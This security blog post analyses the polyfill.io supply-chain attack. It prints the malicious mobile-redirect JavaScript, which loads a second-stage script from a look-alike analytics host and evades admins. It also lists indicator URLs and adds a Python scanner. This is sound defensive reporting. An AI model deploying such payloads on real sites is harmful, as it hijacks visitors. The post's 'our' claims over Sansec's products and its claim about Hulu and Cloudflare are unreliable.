Polyfill - A new attack vector we should look out for

At Hepton.uk, we prioritize our clients’ cybersecurity and continuously monitor emerging threats. Recently, a new attack vector has emerged through a well-known JavaScript library, Polyfill.js, which has raised concerns within the tech community. Here’s what you need to know.

The Polyfill.js Scenario

Polyfill.js is a popular open-source library designed to support older browsers, used by over 100,000 websites. High-profile users include JSTOR, Intuit, and the World Economic Forum. The library was traditionally hosted on the domain cdn.polyfill.io. However, in February of this year, a Chinese company acquired the domain and the associated GitHub account.

Since this acquisition, the domain has been used to inject malware into mobile devices via any site that embeds the Polyfill script from cdn.polyfill.io. Complaints raised as issues on the GitHub repository have been swiftly removed, as captured in archived reports.

Understanding the Malware

The Polyfill code dynamically generates content based on HTTP headers, creating multiple potential attack vectors. Sansec, a security firm, decoded a particular malware that redirects mobile users to a sports betting site through a fake Google Analytics domain (www.googie-anaiytics.com).

This malicious code is sophisticated, employing several layers of protection against reverse engineering. It activates only on specific mobile devices at certain hours and deactivates upon detecting an admin user or the presence of web analytics services, likely to avoid detection in site statistics.

Example of the Malicious Payload

For readability, some names in the original code have been modified. However, the term “tiaozhuan,” meaning “jump” in Chinese, originates from the malware.

// Returns true on desktop platforms; the payload only fires on mobile visitors.
function isPc() {
  try {
    var _isWin = navigator.platform == "Win32" || navigator.platform == "Windows",
      _isMac = navigator.platform == "Mac68K" || navigator.platform == "MacPPC" || navigator.platform == "Macintosh" || navigator.platform == "MacIntel";
    return _isMac || _isWin;
  } catch (_0x44e1f6) {
    return false;
  }
}

// Loads a second-stage script from the look-alike analytics domain and redirects
// only if that script sets usercache. loadJS and usercache are defined elsewhere
// in the payload and are not shown in this excerpt.
function vfed_update(_0x5ae1f8) {
  _0x5ae1f8 !== "" &&
    loadJS("https://www.googie-anaiytics.com/html/checkcachehw.js", function () {
      if (usercache == true) {
        window.location.href = _0x5ae1f8;
      }
    });
}

// Decides whether to redirect: mobile user agent, hour-of-day dependent
// probability, no admin cookie, and not a desktop platform.
function check_tiaozhuan() {
  var _isMobile = navigator.userAgent.match(/(phone|pad|pod|iPhone|iPod|ios|iPad|Android|Mobile|BlackBerry|IEMobile|MQQBrowser|JUC|Fennec|wOSBrowser|BrowserNG|WebOS|Symbian|Windows Phone)/i);
  if (_isMobile) {
    var _curHost = window.location.host,
      _ref = document.referrer,
      _redirectURL = "",
      _kuurzaBitGet = "https://kuurza.com/redirect?from=bitget",
      _rnd = Math.floor(Math.random() * 100 + 1),
      _date = new Date(),
      _hours = _date.getHours();

    // Always redirect on a few hard-coded hosts or when the visitor arrived
    // from an external referrer; otherwise redirect with a probability that
    // varies with the local hour (10-20%).
    if (_curHost.indexOf("www.dxtv1.com") !== -1 || _curHost.indexOf("www.ys752.com") !== -1) {
      _redirectURL = "https://kuurza.com/redirect?from=bitget";
    } else if (_curHost.indexOf("shuanshu.com.com") !== -1) {
      _redirectURL = "https://kuurza.com/redirect?from=bitget";
    } else if (_ref.indexOf(".") !== -1 && _ref.indexOf(_curHost) == -1) {
      _redirectURL = "https://kuurza.com/redirect?from=bitget";
    } else if (_hours >= 0 && _hours < 2) {
      if (_rnd <= 10) {
        _redirectURL = _kuurzaBitGet;
      }
    } else if (_hours >= 2 && _hours < 4) {
      if (_rnd <= 15) {
        _redirectURL = _kuurzaBitGet;
      }
    } else if (_hours >= 4 && _hours < 7) {
      if (_rnd <= 20) {
        _redirectURL = _kuurzaBitGet;
      }
    } else if (_hours >= 7 && _hours < 8) {
      if (_rnd <= 10) {
        _redirectURL = _kuurzaBitGet;
      }
    } else if (_rnd <= 10) {
      _redirectURL = _kuurzaBitGet;
    }

    // Stay silent for desktop users and for anyone carrying an admin cookie,
    // so site operators are unlikely to see the redirect themselves.
    if (_redirectURL !== "" && !isPc() && document.cookie.indexOf("admin_id") == -1 && document.cookie.indexOf("adminlevels") == -1) {
      vfed_update(_redirectURL);
    }
  }
}

Indicators of Compromise

https://kuurza.com/redirect?from=bitget
https://www.googie-anaiytics.com/html/checkcachehw.js
https://www.googie-anaiytics.com/ga.js
https://cdn.bootcss.com/highlight.js/9.7.0/highlight.min.js
https://union.macoms.la/jquery.min-4.0.2.js
https://newcrbpc.com/redirect?from=bscbc
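A practical way to use the indicators above is to scan your own pages for script references to those hosts. The following is an added example, not code from the original post or from Sansec: it parses a page's HTML with the standard library, flags any script or link whose host matches an indicator (plus the hijacked cdn.polyfill.io domain itself), and separately flags cross-origin scripts that carry no SRI integrity attribute. The sample HTML and the site host www.example.com are constructed for the demonstration.

```python
from html.parser import HTMLParser
from urllib.parse import urlparse

# Hosts from the indicators listed above, plus the hijacked CDN domain itself.
IOC_HOSTS = {
    "cdn.polyfill.io", "kuurza.com", "www.googie-anaiytics.com",
    "cdn.bootcss.com", "union.macoms.la", "newcrbpc.com",
}

class RefCollector(HTMLParser):
    """Collect (tag, url, attrs) for every <script src> and <link href>."""
    def __init__(self):
        super().__init__()
        self.refs = []

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        url = a.get("src") if tag == "script" else a.get("href") if tag == "link" else None
        if url:
            self.refs.append((tag, url, a))

def scan_html(html, site_host):
    """Return (severity, url, reason) findings for one page of HTML.

    urlparse() yields hostname None for relative paths and the correct host for
    both absolute and protocol-relative ("//host/x.js") URLs.
    """
    parser = RefCollector()
    parser.feed(html)
    findings = []
    for tag, url, attrs in parser.refs:
        host = urlparse(url).hostname
        if host in IOC_HOSTS:
            findings.append(("high", url, "matches polyfill.io attack indicator"))
        elif tag == "script" and host and host != site_host and "integrity" not in attrs:
            findings.append(("medium", url, "cross-origin script without SRI integrity"))
    return findings

# Constructed sample page (not a real site) exercising each case.
SAMPLE_HTML = """<html><head>
<script src="https://cdn.polyfill.io/v3/polyfill.min.js"></script>
<script src="//www.googie-anaiytics.com/ga.js"></script>
<script src="https://cdn.bootcss.com/highlight.js/9.7.0/highlight.min.js"></script>
<script src="https://static.example-cdn.net/lib.js"></script>
<script src="https://code.jquery.com/jquery-3.7.1.min.js"
        integrity="sha384-CONSTRUCTED-PLACEHOLDER" crossorigin="anonymous"></script>
<script src="/static/app.js"></script>
</head><body></body></html>"""

if __name__ == "__main__":
    for sev, url, why in scan_html(SAMPLE_HTML, "www.example.com"):
        print(f"[{sev}] {url}: {why}")
```

Run it against saved copies of your own pages; a "high" hit means the page still loads from a compromised host, while "medium" hits are third-party scripts you cannot pin with SRI and should review.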

Among the biggest services affected by this malware are Hulu (www.hulu.com) and Cloudflare (www.cloudflare.com).

Quick Fix & Consequences

sansec.io was hit by a DDoS attack after being the first to report this malware, leading to a temporary outage of their website. Soon after, Google started blocking ads for eCommerce sites that were using Polyfill.js.

Later on, Cloudflare added a quick fix that implemented real-time rewrites of “cdn.polyfill.io” links to their own version of the script.

Recommendations

The original Polyfill author has advised against using Polyfill altogether, citing that modern browsers no longer require it. However, for those still in need of such functionality, trustworthy alternatives are available from Fastly and Cloudflare.

This incident exemplifies a supply chain attack, where vulnerabilities are introduced through third-party components. To safeguard your systems, consider using our free CSP monitoring service, Sansec Watch, to gain visibility into the code your users are loading.

Additionally, our eComscan backend scanner has been updated to detect the presence of polyfill.io, ensuring your site’s security against such threats.

Sources

https://sansec.io/research/polyfill-supply-chain-attack